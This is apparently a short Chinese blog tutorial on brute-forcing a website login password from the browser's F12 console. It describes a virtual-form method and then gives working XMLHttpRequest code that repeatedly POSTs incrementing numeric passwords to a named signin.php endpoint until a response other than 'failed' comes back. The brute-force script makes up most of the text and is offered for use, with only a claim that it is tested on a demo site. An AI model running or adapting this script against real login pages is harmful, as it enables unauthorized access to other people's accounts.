内容纲要
利用F12开发人员工具,在console里用JavaScript暴力破解密码。
示例站点:test.icystal.top,本文代码仅确保针对实例站点有效
方式一:构造表单法
就是构造一个虚拟表单,用document.createElement创建一个表单,然后用button.click()或者Form.submit()提交表单,用循环修改input里的内容不停request。最后用network查看response。
方式二:Ajax
如果又jQuery的话就很简单了不停$.post即可,这里讲原生js。
XML=new XMLHttpRequest
url="https://test.icystal.top/signin.php"
i=1000
a=function(){
XML.open("POST",url,true);
XML.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
XML.send("usr=1234&pwd="+i);i++;
}
b=function(){
if(XML.status==200&&XML.readyState==4&&XML.responseText!="failed"){
console.log(XML.responseText);
clearInterval(c);
}
}
c=setInterval(a,500);
setInterval(b,200);
